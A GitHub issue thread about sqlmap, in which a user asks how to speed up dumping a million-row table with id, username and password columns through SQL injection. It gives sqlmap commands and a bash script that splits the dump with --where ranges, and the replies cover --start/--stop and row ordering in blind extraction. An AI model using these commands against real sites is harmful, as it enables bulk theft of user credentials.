### ISSUE TITLE
How does sqlmap dump tables with more than one million rows

### ISSUE THREAD

**Issue by legoc** [sqlmapproject/sqlmap#4987]
for example，
sqlmap.py -u "http://www.example.com" -D test_database -T test_table --count 
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| test_table         | 1000000  |
+---------------------------+---------+

sqlmap.py -u "http://www.example.com?p=1" -D test_database -T test_table --columns

+---------------------------+---------+
| columns                     | Entries |
+---------------------------+---------+
| id                                | 
+---------------------------+---------+
| username                      | 
+---------------------------+---------+
| password                        | 
+---------------------------+---------+
if I use 
sqlmap.py -u "http://www.example.com" -D test_database -T test_table --dump
I guess sqlmap use the sql
`select id,username,password from test_table limit 0,1 ----> select id,username,password from test_table limit 99999,1` 

then as the limit grows, it will run slower and slower
But the ID is self-increasing
ID from 1 to 999999

So which parameter can I use to help me run faster?

Now I am using shell script to and where parameter to improve my running speed
```
#!/bin/bash

python sqlmap.py -u "http://www.example.com?p=1" --random-agent -D test_database  -T test_table  --dump --threads 10 --where "id>0 and id < 50000"
python sqlmap.py -u "http://www.example.com?p=1" --random-agent -D test_database  -T test_table  --dump --threads 10 --where "id>50000 and id < 100000"
....
....
python sqlmap.py -u "http://www.example.com?p=1" --random-agent -D test_database  -T test_table  --dump --threads 10 --where "id>950000 and id < 1000000"
```

**Comment by hosxxtn-collab** [comment]
Hi , i guess you can use the switches --start and --stop

**Comment by stamparm** [comment]
1) you just skipped the issue template, so i have to do guessing here
2) i guess that you have a boolean-based blind or error-based or smth, where sqlmap has to retrieve one row by one row. in such cases, sqlmap has to do "ORDER BY" by some column so you could get CORRECT data. otherwise, you would get mixed rows with mixed columns, because the SQL engine on the other side is most probably non-deterministict (i.e. one SELECT will not result with same results a another same SELECT)
